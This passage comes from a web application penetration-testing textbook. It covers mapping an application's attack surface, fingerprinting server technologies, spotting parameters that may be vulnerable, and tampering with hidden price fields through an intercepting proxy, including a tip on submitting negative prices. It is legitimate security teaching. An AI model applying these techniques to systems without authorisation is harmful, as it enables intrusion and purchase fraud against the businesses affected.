ment of the mapping process. Equally important is the task of analyzing the

application’s functionality, behavior, and technologies employed, in order to

identify the key attack surfaces that it exposes, and begin formulating an

approach to probing the application for exploitable vulnerabilities.

Some key areas to investigate are:

■■ The core functionality of the application: the actions that it can be leveraged to perform when used as intended.

■■ Other more peripheral behavior of the application, including off-site links, error messages, administrative and logging functions, use of redirects, and so on.

■■ The core security mechanisms and how they function, in particular management of session state, access controls, and authentication mechanisms and supporting logic (user registration, password change, account recovery, etc.).

■■ All of the different locations at which user-supplied input is processed by the application: every URL, query string parameter, item of POST data, cookie, and the like.

■■ The technologies employed on the client side, including forms, client-side scripts, thick-client components (Java applets, ActiveX controls, and Flash), and cookies.

■■ The technologies employed on the server side, including static and dynamic pages, the types of request parameters employed, use of SSL, web server software, interaction with databases, email systems and other back-end components.

■■ Any other details that may be gleaned about the internal structure and functionality of the server-side application: the mechanisms it uses behind the scenes to deliver the functionality and behavior that is visible from the client perspective.

Identifying Entry Points for User Input

The majority of ways in which the application captures user input for server-

side processing should be obvious when reviewing the HTTP requests that are

generated as you walk through the application’s functionality. The key loca-

tions to pay attention to are:

■■ Every URL string up to the query string marker.

■■ Every parameter submitted within the URL query string.

■■ Every parameter submitted within the body of a POST request.

■■ Every cookie.

■■ Every other HTTP header that in rare cases may be processed by the application, in particular the User-Agent, Referer, Accept, Accept-Language, and Host headers.
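The locations listed above can be pulled out of a captured request with a few lines of code. The following is a rough sketch, assuming a well-formed raw request with CRLF line endings, a form-encoded body, and a header spelled exactly "Cookie"; entry_points is a hypothetical helper name:

```python
from http.cookies import SimpleCookie
from urllib.parse import parse_qsl, urlsplit


def entry_points(raw_request):
    """List (location, value) pairs where user input enters a request."""
    head, _, body = raw_request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = dict(line.split(": ", 1) for line in lines[1:])
    parts = urlsplit(target)

    points = [("path", parts.path)]
    points += [("query:" + k, v)
               for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    if method == "POST":
        points += [("body:" + k, v)
                   for k, v in parse_qsl(body, keep_blank_values=True)]
    cookies = SimpleCookie(headers.get("Cookie", ""))
    points += [("cookie:" + k, morsel.value) for k, morsel in cookies.items()]
    points += [("header:" + k, v) for k, v in headers.items() if k != "Cookie"]
    return points


raw = ("POST /search.php?page=2 HTTP/1.1\r\n"
       "Host: wahh-app.com\r\n"
       "Cookie: SessionId=abc123\r\n"
       "User-Agent: test\r\n"
       "\r\n"
       "term=foo&Submit=Ok")
for location, value in entry_points(raw):
    print(location, "=", value)
```

A listing like this is only a starting checklist; applications that use a custom query string format need their parameters dissected by hand.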

Some applications do not employ the standard query string format (which

was described in Chapter 3), but employ their own custom scheme, which

may use nonstandard query string markers and field separators, may embed

other data schemes such as XML within the query string, or may effectively

place the query string within what appears to be the directory or filename por-

tion of the URL. Here are some examples of nonstandard query string formats

that the authors have encountered in the wild:

■■

/dir/file;foo=bar&foo2=bar2

■■

/dir/file?foo=bar$foo2=bar2

■■

/dir/file/foo%3dbar%26foo2%3dbar2

■■

/dir/foo.bar/file

■■

/dir/foo=bar/file

■■

/dir/file?param=foo:bar

■■

/dir/file?data=%3cfoo%3ebar%3c%2ffoo%3e%3cfoo2%3ebar2%3c%2ffoo2%3e

If a nonstandard query string format is being used, then you will need to

take account of this when probing the application for all kinds of common vul-

nerabilities. For example, when testing the final URL in this list, if you were to

ignore the custom format and simply treat the query string as containing a sin-

gle parameter called

data, and so submit various kinds of attack payloads as

the value of this parameter, you would miss many kinds of vulnerability that

may exist in the processing of the query string. If, conversely, you dissect the

format and place your payloads within the embedded XML data fields, you

may immediately discover a critical bug such as SQL injection or path

traversal.
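As a rough illustration of the final URL in the list above, the following Python sketch decodes the XML carried in the data parameter, places a test payload into each embedded field in turn, and re-encodes the result. The function name, the temporary wrapper element, and the single-quote payload are assumptions made for illustration only; a real custom format needs to be dissected case by case.

```python
from urllib.parse import quote, unquote
import xml.etree.ElementTree as ET


def payload_variants(encoded_data, payload):
    """Yield one re-encoded value per embedded XML field, each carrying the payload."""
    fragment = unquote(encoded_data)
    # The sample value has no single root element, so wrap it in a
    # temporary one (an assumption about this particular format).
    wrapped = "<wrapper>" + fragment + "</wrapper>"
    field_count = len(ET.fromstring(wrapped))
    for index in range(field_count):
        copy = ET.fromstring(wrapped)
        copy[index].text = payload
        inner = "".join(ET.tostring(child, encoding="unicode") for child in copy)
        yield quote(inner, safe="")


sample = "%3cfoo%3ebar%3c%2ffoo%3e%3cfoo2%3ebar2%3c%2ffoo2%3e"
variants = list(payload_variants(sample, "'"))
for value in variants:
    print("/dir/file?data=" + value)
```

Each printed URL differs from the original in exactly one embedded field, which is the point of dissecting the format rather than treating data as a single opaque parameter.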

A final class of entry points for user input includes any out-of-band channel

by which the application receives data that you may be able to control. Some

of these entry points may be entirely undetectable if you simply inspect the

HTTP traffic generated by the application, and finding them usually requires

an understanding of the wider context of the functionality that the application

implements. Some examples of web applications that receive user-controllable

data via an out-of-band channel include:

■■

A web mail application which processes and renders email messages

received via SMTP.

■■

A publishing application that contains a function to retrieve content via

HTTP from another server.

■■

An intrusion detection application that gathers data using a network

sniffer and presents this using a web application interface.


Identifying Server-Side Technologies

It is normally possible to fingerprint the technologies employed on the server

via various clues and indicators.

Banner Grabbing

Many web servers disclose fine-grained version information, both about the

web server software itself and about other components that have been

installed. For example, the HTTP

Server header discloses a huge amount of

detail about some installations:

Server: Apache/1.3.31 (Unix) mod_gzip/1.3.26.1a mod_auth_passthrough/1.8

mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.9 FrontPage/5.0.2.2634a

mod_ssl/2.8.20 OpenSSL/0.9.7a

In addition to the Server header, other locations where the type and version

of software may be disclosed are:

■■

Templates used to build HTML pages

■■

Custom HTTP headers

■■

URL query string parameters
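A verbose banner like the one shown above can be broken into its components mechanically. The sketch below is a minimal example, assuming the banner follows the common product/version token layout; the function name is hypothetical, and a customized or falsified banner will not parse into anything meaningful.

```python
import re


def parse_server_banner(banner):
    """Split a Server header value into (product, version) pairs."""
    # Drop parenthesised comments such as "(Unix)" before tokenising.
    without_comments = re.sub(r"\([^)]*\)", " ", banner)
    components = []
    for token in without_comments.split():
        product, _, version = token.partition("/")
        components.append((product, version or None))
    return components


banner = ("Apache/1.3.31 (Unix) mod_gzip/1.3.26.1a mod_auth_passthrough/1.8 "
          "mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.9 FrontPage/5.0.2.2634a "
          "mod_ssl/2.8.20 OpenSSL/0.9.7a")
components = parse_server_banner(banner)
for product, version in components:
    print(product, version)
```

Each product and version pair can then be researched individually for known vulnerabilities.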

HTTP Fingerprinting

In principle, any item of information returned by the server may be cus-

tomized or even deliberately falsified, and banners like the

Server header are

no exception. Some web server software includes a facility for administrators

to set an arbitrary value for the

Server header. Further, there are security prod-

ucts that use various methods to try to prevent a web server’s software from

being detected, such as ServerMask by Port80 Software.

Attempting to grab the server banner from Port80’s own web server does

not appear to disclose much useful information:

HEAD / HTTP/1.0

Host: www.port80software.com

HTTP/1.1 200 OK

Date: Sun, 04 Mar 2007 16:14:26 GMT

Server: Yes we are using ServerMask!

Set-Cookie: countrycode=UK; path=/

Set-Cookie: ALT.COOKIE.NAME.2=89QMSN102,S62OS21C51N2NP,,0105,N7; path=/

Cache-control: private

Content-Length: 27399


Connection: Keep-Alive

Content-Type: text/html

Set-Cookie: Coyote-2-d1f579d9=ac1000d9:0; path=/

Despite measures such as this, it is usually possible for a determined

attacker to use other aspects of the web server’s behavior to determine the

software in use, or at least narrow down the range of possibilities. The HTTP

specification contains a lot of detail that is optional or left to an implementer’s

discretion. Further, many web servers deviate from or extend the specification

in various different ways. As a result, there are numerous subtle ways in which

a web server can be fingerprinted, other than via its

Server banner. Httprint is

a handy tool that performs a number of tests in an attempt to fingerprint a web

server’s software. In the case of Port80 Software’s server, it reports with a 58%

degree of confidence that the server software in use is in fact Microsoft IIS ver-

sion 5.1, as shown in Figure 4-6.

Figure 4-6: Httprint fingerprinting various different web servers

The screenshot also illustrates how Httprint can defeat other kinds of

attempts to mislead about the web server software being used. The Found-

stone web site uses a misleading banner, but Httprint can still discover the

actual software. And the RedHat server is configured to present the nonver-

bose banner “Apache,” but Httprint is able to deduce the specific version of

Apache being used with a high degree of confidence.
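One simple behavioral clue of this kind is the order in which a server emits its response headers, which tends to differ between server implementations. The sketch below is not a description of how Httprint works internally; it only illustrates, under that assumption, how a header-order signature could be recorded and later compared against servers whose software is known. The function name is hypothetical, and the sample is an abridged copy of the response shown earlier.

```python
def header_order(raw_response):
    """Return response header names in the order the server sent them."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")[1:]  # skip the status line
    names = []
    for line in lines:
        name = line.split(":", 1)[0].strip()
        # Record each header name once, at its first position.
        if name and name not in names:
            names.append(name)
    return tuple(names)


sample = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Date: Sun, 04 Mar 2007 16:14:26 GMT",
    "Server: Yes we are using ServerMask!",
    "Set-Cookie: countrycode=UK; path=/",
    "Cache-control: private",
    "Content-Length: 27399",
    "Connection: Keep-Alive",
    "Content-Type: text/html",
    "", "",
])
signature = header_order(sample)
print(signature)
```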


File Extensions

File extensions used within URLs often disclose the platform or programming

language used to implement the relevant functionality. For example:

■■

asp — Microsoft Active Server Pages

■■

aspx — Microsoft ASP.NET

■■

jsp — Java Server Pages

■■

cfm — Cold Fusion

■■

php — the PHP language

■■

d2w — WebSphere

■■

pl — the Perl language

■■

py — the Python language

■■

dll — usually compiled native code (C or C++)

■■

nsf or ntf — Lotus Domino

Even if an application does not employ a particular file extension in its pub-

lished content, it is usually possible to verify whether the technology support-

ing that extension is implemented on the server. For example, if ASP.NET is

installed, requesting a nonexistent

.aspx file will return a customized error

page generated by the ASP.NET framework, as shown in Figure 4-7, whereas

requesting a nonexistent file with a different extension returns a generic error

message generated by the web server, as shown in Figure 4-8.

Figure 4-7: A customized error page indicating that the ASP.NET platform is present

on the server


Figure 4-8: A generic error message created when an unrecognized file extension is

requested

Using the automated content discovery techniques already described, it is

possible to request a large number of common file extensions and quickly con-

firm whether any of the associated technologies are implemented on the

server.
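The extension check described above can be sketched as follows. The code requests a nonexistent file for each extension and groups the extensions by the error response they produce; an extension that lands in a group of its own is likely mapped to a dedicated handler. The function names, the file stem, and the canned error texts in the stand-in fetch function are all assumptions, used so that the example runs without network access.

```python
from collections import defaultdict


def group_by_error_signature(fetch, extensions, stem="/wahh-nonexistent-file"):
    """Request a nonexistent file per extension and group extensions by response."""
    groups = defaultdict(list)
    for ext in extensions:
        status, body = fetch(stem + "." + ext)
        # Use the status code and the start of the body as a crude signature.
        groups[(status, body[:60])].append(ext)
    return dict(groups)


def fake_fetch(path):
    """Stand-in for a real HTTP client (hypothetical responses)."""
    if path.endswith(".aspx"):
        return 404, "Server Error in '/' Application. The resource cannot be found."
    return 404, "The page cannot be found"


groups = group_by_error_signature(fake_fetch, ["aspx", "jsp", "php", "cfm"])
for signature, exts in groups.items():
    print(signature, exts)
```

In practice, fake_fetch would be replaced with a function that issues the request to the target and returns the status code and body.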

The divergent behavior described arises because many web servers map

specific file extensions to particular server-side components. Each different

component may handle errors (including requests for nonexistent content) in

a different way. Figure 4-9 shows the various extensions that are mapped to

different handler DLLs in a default installation of IIS 5.0.

Figure 4-9: File extension mappings in IIS 5.0


It is possible to detect the presence of each file extension mapping via the

different error messages generated when that file extension is requested.

In some cases, discovering a particular mapping may indicate the presence

of a web server vulnerability — for example, the

.printer and .ida/.idq

handlers in IIS have in the past been found vulnerable to buffer overflow

vulnerabilities.

Another common fingerprint to be aware of is a URL that looks like the following:

https://wahh-app/news/0,,2-421206,00.html

The comma-separated numbers towards the end of the URL are usually gen-

erated by the Vignette content management platform.

Directory Names

It is common to encounter subdirectory names that indicate the presence of an

associated technology. For example:

■■

servlet — Java servlets

■■

pls — Oracle Application Server PL/SQL gateway

■■

cfdocs or cfide — Cold Fusion

■■

SilverStream — The SilverStream web server

■■

WebObjects or {function}.woa — Apple WebObjects

■■

rails — Ruby on Rails

Session Tokens

Many web servers and web application platforms generate session tokens by

default with names that provide information about the technology in use. For

example:

■■

JSESSIONID — The Java Platform

■■

ASPSESSIONID — Microsoft IIS server

■■

ASP.NET_SessionId — Microsoft ASP.NET

■■

CFID/CFTOKEN — Cold Fusion

■■

PHPSESSID — PHP
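The token names listed above lend themselves to a simple lookup. The following sketch maps cookie names observed during mapping to the technologies they suggest. The table simply restates the list; the function name and the use of case-insensitive prefix matching are assumptions (prefix matching is used because IIS typically appends extra characters to the ASPSESSIONID name).

```python
# Token name prefixes and the technology each one suggests (from the list above).
TOKEN_HINTS = [
    ("JSESSIONID", "The Java Platform"),
    ("ASPSESSIONID", "Microsoft IIS server"),
    ("ASP.NET_SessionId", "Microsoft ASP.NET"),
    ("CFID", "Cold Fusion"),
    ("CFTOKEN", "Cold Fusion"),
    ("PHPSESSID", "PHP"),
]


def guess_technologies(cookie_names):
    """Return the technologies suggested by a list of cookie names."""
    found = []
    for name in cookie_names:
        for prefix, technology in TOKEN_HINTS:
            if name.upper().startswith(prefix.upper()) and technology not in found:
                found.append(technology)
    return found


print(guess_technologies(["ASPSESSIONIDQABCDEFG", "countrycode"]))
```

Because token names can be changed by configuration, a match is a hint rather than proof, and the absence of a match says nothing.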


Third-Party Code Components

Many web applications incorporate third-party code components to implement common functionality such as shopping carts, login mechanisms, and message boards. These may be open source or may have been purchased from an external software developer. When this is the case, the same components often appear within numerous other web applications on the Internet, which you can inspect to understand how the component functions. Often, other applications make use of different features of the same component, enabling you to identify additional behavior and functionality beyond what is directly visible in the target application. Also, the software may contain known vulnerabilities that have been discussed elsewhere, or you may be able to download and install the component yourself and perform a source code review or probe it for defects in a controlled way.

HACK STEPS

■ Identify all entry points for user input, including URLs, query string para-

meters, POST data, cookies, and other HTTP headers processed by the

application.

■ Examine the query string format used by the application. If it does not

employ the standard format described in Chapter 3, try to understand

how parameters are being transmitted via the URL. Virtually all custom

schemes still employ some variation on the name/value model, so try to

understand how name/value pairs are being encapsulated into the non-

standard URLs you have identified.

■ Identify any out-of-band channels via which user-controllable or other third-party data is being introduced into the application’s processing.

■ View the HTTP Server banner returned by the application. Note that in

some cases, different areas of the application are handled by different

back-end components, and so different Server headers may be

received.

■ Check for any other software identifiers contained within any custom

HTTP headers or HTML source code comments.

■ Run the Httprint tool to fingerprint the web server.

■ If fine-grained information is obtained about the web server and other

components, research the software versions in use to identify any vulner-

abilities that may be exploited to advance an attack (see Chapter 17).

■ Review your map of application URLs, to identify any interesting-looking

file extensions, directories, or other subsequences that may provide clues

about the technologies in use on the server.


■ Review the names of all session tokens issued by the application to iden-

tify the technologies being used.

■ Use lists of common technologies, or Google, to establish which tech-

nologies may be in use on the server, or discover other web sites and

applications that appear to be employing the same technologies.

■ Perform searches on Google for the names of any unusual cookies,

scripts, HTTP headers, and the like that may belong to third-party soft-

ware components. If you locate other applications in which the same

components are being used, review these to identify any additional

functionality and parameters that the components support, and verify

whether these are also present in your target application. Note that third-

party components may look and feel quite different in each implementa-

tion, due to branding customizations, but the core functionality, including

script and parameter names, is often the same. If possible, download and

install the component and analyze it to fully understand its capabilities

and if possible discover any vulnerabilities. Consult repositories of

known vulnerabilities to identify any known defects with the component

in question.

Identifying Server-Side Functionality

It is often possible to infer a great deal about server-side functionality and

structure, or at least make an educated guess, by observing clues that the

application discloses to the client.

Dissecting Requests

Consider the following URL, which is used to access a search function:

https://wahh-app.com/calendar.jsp?name=new%20applicants&isExpired=0&startDate=22%2F09%2F2006&endDate=22%2F03%2F2007&OrderBy=name

As we have seen, the .jsp file extension indicates that Java Server Pages are

in use. You may guess that a search function will retrieve its information from

either an indexing system or a database; the presence of the

OrderBy parame-

ter suggests that a back-end database is being used, and that the value you

submit may be used as the

ORDER BY clause of a SQL query. This parameter

may well be vulnerable to SQL injection, as may any of the other parameters if

they are used in database queries (see Chapter 9).


Also of interest among the other parameters is the isExpired field. This appears to be a Boolean flag specifying whether the search query should include expired content. If the application designers did not expect ordinary users to be able to retrieve any expired content, changing this parameter from 0 to 1 could identify an access control vulnerability (see Chapter 8).
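To make this kind of dissection concrete, the sketch below splits the calendar URL into its decoded parameters and builds a variant with the isExpired flag flipped. The helper name with_parameter is hypothetical. Note that re-encoding with urlencode writes the space in the name value as a plus sign rather than %20, which servers normally treat as equivalent in a query string.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def with_parameter(url, name, value):
    """Return a copy of url with one query string parameter replaced."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    changed = [(k, value if k == name else v) for k, v in params]
    return urlunsplit(parts._replace(query=urlencode(changed)))


url = ("https://wahh-app.com/calendar.jsp?name=new%20applicants&isExpired=0"
       "&startDate=22%2F09%2F2006&endDate=22%2F03%2F2007&OrderBy=name")

# List each parameter with its decoded value, as a starting point for review.
for key, val in parse_qsl(urlsplit(url).query):
    print(key, "=", val)

modified = with_parameter(url, "isExpired", "1")
print(modified)
```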

The following URL, which allows users to access a content management

system, contains a different set of clues:

https://wahh-app.com/workbench.aspx?template=NewBranch.tpl&loc=/default&ver=2.31&edit=false

Here, the .aspx file extension indicates that this is an ASP.NET application.

It also appears highly likely that the

template parameter is used to specify a

filename, and the

loc parameter is used to specify a directory. The possible file

extension

.tpl appears to confirm this, as does the location /default, which

could very well be a directory name. It is possible that the application retrieves

the template file specified and includes the contents into its response. These

parameters may well be vulnerable to path traversal attacks, allowing arbi-

trary files to be read from the server (see Chapter 10).

Also of interest is the edit parameter, which is set to false. It may be that changing this value to true will modify the application’s behavior, potentially enabling an attacker to edit items that the application developer did not intend to be editable. The ver parameter does not have any readily guessable purpose, but it may be that modifying this will cause the application to perform a different set of functions that may be exploitable by an attacker.

Finally, consider the following request, which is used to submit a question to

application administrators:

POST /feedback.php HTTP/1.1

Host: wahh-app.com

Content-Length: 389

[email protected]&[email protected]&subject=

Problem+logging+in&message=Please+help...

As with the other examples, the .php file extension indicates that the func-

tion is implemented using the PHP language. Further, it is extremely likely

that the application is interfacing with an external email system, and it appears

that user-controllable input is being passed to that system in all relevant fields

of the email. The function may be exploitable to send arbitrary messages to

any recipient, and any of the fields may also be vulnerable to email header

injection (see Chapter 9).


HACK STEPS

■ Review the names and values of all parameters being submitted to the

application, in the context of the functionality which they support.

■ Try to think like a programmer, and imagine what server-side mecha-

nisms and technologies are likely to have been used to implement the

behavior that you can observe.

Extrapolating Application Behavior

Often, an application behaves in a consistent way across the range of its func-

tionality. This may be because different functions were written by the same

developer, or to the same design specification, or share some common code

components. In this situation, it may be possible to draw conclusions about

server-side functionality in one area and extrapolate these to another area.

For example, the application may enforce some global input validation

checks, such as sanitizing various kinds of potentially malicious input before

it is processed. Having identified a blind SQL injection vulnerability, you may

encounter problems exploiting it, because your crafted requests are being

modified in unseen ways by the input validation logic. However, there may be

other functions within the application that provide good feedback about the

kind of sanitization being performed — for example, a function that echoes

some user-supplied data back to the browser. You may be able to use this func-

tion to test different encodings and variations of your SQL injection payload,

to determine what raw input must be submitted to achieve the desired attack

string after the input validation logic has been applied. If you are lucky, the

validation works in the same way across the application, enabling you to

exploit the injection flaw.
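The probing approach described above can be sketched as follows. A set of probe strings is passed through a function that echoes input back, and any differences are recorded. The echo function here is a stand-in with an invented filter (it doubles single quotes and removes the first occurrence of a double hyphen); against a real target it would submit the probe to the echoing function and return what comes back. All names are hypothetical.

```python
def changed_by_filter(echo, probes):
    """Return {probe: echoed} for every probe that the filter altered."""
    changed = {}
    for probe in probes:
        echoed = echo(probe)
        if echoed != probe:
            changed[probe] = echoed
    return changed


def fake_echo(value):
    """Hypothetical filter: doubles single quotes, strips the first '--'."""
    return value.replace("'", "''").replace("--", "", 1)


probes = ["'", "\"", "--", "----", ";", "/*", "SELECT"]
changed = changed_by_filter(fake_echo, probes)
for raw, echoed in changed.items():
    print(repr(raw), "->", repr(echoed))
```

With this invented filter, the output shows that submitting four hyphens leaves two in place after filtering, which is the kind of observation that tells you what raw input to send elsewhere in the application.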

Some applications use custom obfuscation schemes when storing sensitive

data on the client, to prevent casual inspection and modification of this data by

users (see Chapter 5). Some such schemes may be extremely difficult to deci-

pher given access to only a sample of obfuscated data. However, there may be

functions within the application where a user can supply an obfuscated string

and retrieve the original — for example, an error message may include the

deobfuscated data which led to the error. If the same obfuscation scheme is

used throughout the application, it may be possible to take an obfuscated

string from one location (for example a cookie), and feed it into the other func-

tion to decipher its meaning. It may also be possible to reverse engineer the

obfuscation scheme by submitting systematically varying values to the func-

tion and monitoring their deobfuscated equivalents.


Finally, errors are often handled in an inconsistent manner within the appli-

cation, with some areas trapping and handling errors gracefully, while other

areas simply crash and return verbose debugging information to the user (see

Chapter 14). In this situation, it may be possible to gather information from the

error messages returned in one area and apply it to other areas where errors

are gracefully handled. For example, by manipulating request parameters in

systematic ways and monitoring the error messages received, it may be possi-

ble to determine the internal structure and logic of the application component

concerned; if you are lucky, aspects of this structure may be replicated in other

areas.

HACK STEPS

■ Try to identify any locations within the application that may contain clues

about the internal structure and functionality of other areas.

■ It may not be possible to draw any firm conclusions here; however, the

cases identified may prove useful at a later stage of the attack when

attempting to exploit any potential vulnerabilities.

Mapping the Attack Surface

The final stage of the mapping process is to identify the various attack surfaces

exposed by the application, and the potential vulnerabilities that are com-

monly associated with each one. The following is a rough guide to some key

types of behavior and functionality that you may identify, and the kinds of

vulnerability that are most commonly found within each one. The remainder

of this book will be concerned with the practical details of how you can detect

and exploit each of these problems:

■■

Client-side validation — Checks may not be replicated on the server.

■■

Database interaction — SQL injection.

■■

File uploading and downloading — Path traversal vulnerabilities.

■■

Display of user-supplied data — Cross-site scripting.

■■

Dynamic redirects — Redirection and header injection attacks.

■■

Login — Username enumeration, weak passwords, ability to use brute force.

■■

Multistage login — Logic flaws.

■■

Session state — Predictable tokens, insecure handling of tokens.

■■

Access controls — Horizontal and vertical privilege escalation.


■■

User impersonation functions — Privilege escalation.

■■

Use of cleartext communications — Session hijacking, capture of cre-

dentials and other sensitive data.

■■

Off-site links — Leakage of query string parameters in the Referer

header.

■■

Interfaces to external systems — Shortcuts in handling of sessions

and/or access controls.

■■

Error messages — Information leakage.

■■

Email interaction — Email and/or command injection.

■■

Native code components or interaction — Buffer overflows.

■■

Use of third-party application components — Known vulnerabilities.

■■

Identifiable web server software — Common configuration weak-

nesses, known software bugs.

HACK STEPS

■ Understand the core functionality implemented within the application

and the main security mechanisms in use.

■ Identify all features of the application’s functionality and behavior that

are often associated with common vulnerabilities.

■ Formulate a plan of attack prioritizing the most interesting-looking func-

tionality and the most serious of the associated potential vulnerabilities.

Chapter Summary

Mapping the application is a key prerequisite to attacking it. While it may be

tempting to dive straight in and start probing for actual bugs, taking time to

gain a sound understanding of the application’s functionality, technologies,

and attack surface will pay dividends down the line.

As with almost all of web application hacking, the most effective approach

is to use manual techniques supplemented where appropriate by controlled

automation. There is no fully automated tool that can carry out a thorough

mapping of the application in a safe way. To do this, you need to use your

hands and draw on your own experience. The core methodology we have out-

lined involves:

■■

Manual browsing and user-directed spidering, to enumerate the appli-

cation’s visible content and functionality.


■■

Use of brute force combined with human inference and intuition to dis-

cover as much hidden content as possible.

■■

An intelligent analysis of the application, to identify its key functional-

ity, behavior, security mechanisms, and technologies.

■■

An assessment of the application’s attack surface, highlighting the most

promising functions and behavior for more focused probing into

exploitable vulnerabilities.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. While mapping an application, you encounter the following URL:

https://wahh-app.com/CookieAuth.dll?GetLogon?curl=Z2Fdefault.aspx

What information can you deduce about the technologies employed on

the server, and how it is likely to behave?

2. The application you are targeting implements web forum functionality.

The only URL you have discovered is:

http://wahh-app.com/forums/ucp.php?mode=register

How might you obtain a listing of forum members?

3. While mapping an application, you encounter the following URL:

https://wahh-app.com/public/profile/Address.asp?action=view&location=default

What information can you infer about server-side technologies? What

can you conjecture about other content and functionality that may

exist?

4. A web server’s responses include the following header:

Server: Apache-Coyote/1.1

What does this indicate about the technologies in use on the server?

5. You are mapping two different web applications, and you request the URL /admin.cpf from each application. The response headers returned by each request are shown here. From these headers alone, what can you deduce about the presence of the requested resource within each application?

HTTP/1.1 200 OK

Server: Microsoft-IIS/5.0

Expires: Mon, 25 Jun 2007 14:59:21 GMT

Content-Location: http://wahh-app.com/includes/error.htm?404;http://wahh-app.com/admin.cpf

Date: Mon, 25 Jun 2007 14:59:21 GMT

Content-Type: text/html

Accept-Ranges: bytes

Content-Length: 2117

HTTP/1.1 401 Unauthorized

Server: Apache-Coyote/1.1

WWW-Authenticate: Basic realm="Wahh Administration Site"

Content-Type: text/html;charset=utf-8

Content-Length: 954

Date: Mon, 25 Jun 2007 15:07:27 GMT

Connection: close

CHAPTER 5

Bypassing Client-Side Controls

Chapter 1 described how the core security problem with web applications arises because clients can submit arbitrary input. Despite this fact, a large proportion of web applications nevertheless rely upon various kinds of measures implemented on the client side to control the data that the client submits to the server. In general, this represents a fundamental security flaw: the user has full control over the client and the data it submits, and can bypass any controls which are implemented on the client side and not replicated on the server.

There are two broad ways in which an application may rely upon client-side controls to restrict user input. First, an application may transmit data via the client component, using some mechanism that it assumes will prevent the user from modifying that data. Second, when an application gathers data that is entered by the user, it may implement measures on the client side that control the contents of that data before it is submitted. This may be achieved using HTML form features, client-side scripts, or thick-client technologies.

We will look at examples of each kind of client-side control and describe ways in which they can be bypassed.

Transmitting Data via the Client

It is very common to see an application passing data to the client in a form that is not directly visible or modifiable by the end user, in the expectation that this data will be sent back to the server in a subsequent request. Often, the application’s developers simply assume that the transmission mechanism used will ensure that the data transmitted via the client will not be modified along the way.

Because everything submitted from the client to the server is within the

user’s full control, the assumption that data transmitted via the client will not

be modified is usually false, and often leaves the application vulnerable to one

or more attacks.

You may reasonably wonder why, if a particular item of data is known and

specified by the server, the application would ever need to transmit this value

to the client and then read it back. In fact, writing applications in this way is

often an easier task for developers, because it removes the need to keep track

of all kinds of data within the user’s session. Reducing the amount of per-

session data being stored on the server can also improve the application’s

performance. Further, if an application is deployed on several load-balanced

servers, with users potentially interacting with more than one server to per-

form a multistep action, then it may not be straightforward to share server-

side data between the hosts that may handle the same user’s requests. Using

the client to transmit data can present a tempting solution to the problem.

However, transmitting sensitive data in this way is usually unsafe and has

been the cause of countless vulnerabilities in applications.

Hidden Form Fields

Hidden HTML form fields are a common mechanism for transmitting data

via the client in a superficially unmodifiable way. If a field is flagged as hid-

den, it is not displayed on-screen. However, the field’s name and value are

stored within the form and sent back to the application when the user submits

the form.

The classic example of this security flaw is a retailing application that stores

the prices of products within hidden form fields. In the early days of web

applications, this vulnerability was extremely widespread, and it by no means

has been eliminated today. Figure 5-1 shows a typical form.

Figure 5-1: A typical HTML form


The code behind this form is as follows:

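<form action="/order.asp" method="post">
<p>Product: Sony VAIO A217S</p>
<p>Quantity: <input size="2" name="quantity">
<input name="price" type="hidden" value="1224.95">
<input type="submit" value="Buy"></p>
</form>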

Notice the form field called price, which is flagged as hidden. This field will

be sent to the server when the user submits the form:

POST /order.asp HTTP/1.1

Host: wahh-app.com

Content-Length: 24

quantity=1&price=1224.95

Now, although the price field is not displayed on-screen, and it is not

editable by the user, this is solely because the application has instructed the

browser to hide the field. Because everything that occurs on the client side is

ultimately within the user’s control, this restriction can be circumvented in

order to edit the price.

One way to achieve this is to save the source code for the HTML page, edit

the value of the field, reload the source into a browser, and click the Buy but-

ton. However, a more elegant and easier method is to use an intercepting

proxy to modify the desired data on the fly.

An intercepting proxy is tremendously useful when attacking a web appli-

cation and is the one truly indispensable tool that you need in your arsenal.

There are numerous such tools available, but the most functional and popu-

lar are:

■■

Burp Proxy (part of Burp Suite)

■■

WebScarab

■■

Paros

The proxy sits between your web browser and the target application. It

intercepts every request issued to the application, and every response received

back, for both HTTP and HTTPS. It can trap any intercepted message for

inspection or modification by the user. The proxies listed also have numerous

advanced functions to make your job easier, including:

■■

Fine-grained rules to control which messages are trapped.

■■

Regex-based replacement of message content.


■■

Automatic updating of the Content-Length header when messages are

modified.

■■

Browsing history and message cache.

■■

Ability to replay and remodify individual requests.

■■

Integration with other tools such as spiders and fuzzers.

If you have not installed or used a proxy tool before, see Chapter 19 for

instructions and for a comparison of the main tools available.

Once an intercepting proxy has been installed and suitably configured, you

can trap the request that submits the form, and modify the

price field to any

value, as shown in Figure 5-2.

Figure 5-2: Modifying the values of hidden form fields using an intercepting proxy

If the application processes the transaction based on the price submitted,

then you can purchase the product for any price of your choosing.

TIP If you find an application that is vulnerable in this way, see whether you

can submit a negative amount as the price. In some cases, applications have

actually accepted transactions using negative prices. The attacker receives a

refund to their credit card and also the goods which they ordered — a win-win

situation if ever there was one.
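The modified submission can also be reproduced outside the browser. The following is a minimal sketch using Python's standard library; the URL and the helper name build_order_request are assumptions made for illustration, and the request is only constructed, not sent.

```python
from urllib.parse import urlencode
from urllib.request import Request


def build_order_request(url, quantity, price):
    """Build (but do not send) the POST that the Buy form would submit."""
    # The hidden field is just another name/value pair in the request body.
    body = urlencode({"quantity": quantity, "price": price}).encode("ascii")
    return Request(
        url,
        data=body,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )


# Hypothetical target URL; only test applications you are authorized to assess.
req = build_order_request("https://wahh-app.com/order.asp", 1, "1")
negative = build_order_request("https://wahh-app.com/order.asp", 1, "-100")
print(req.get_method(), req.full_url)
print(req.data.decode())
print(negative.data.decode())
```

Whether the server honors either value depends entirely on whether it re-checks the price against its own records.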

HTTP Cookies

Another common mechanism for transmitting data via the client is HTTP cook-

ies. As with hidden form fields, these are not normally displayed on-screen or

directly modifiable by the user. They can, of course, be modified using an inter-

cepting proxy, either by changing the server response that sets them, or subse-

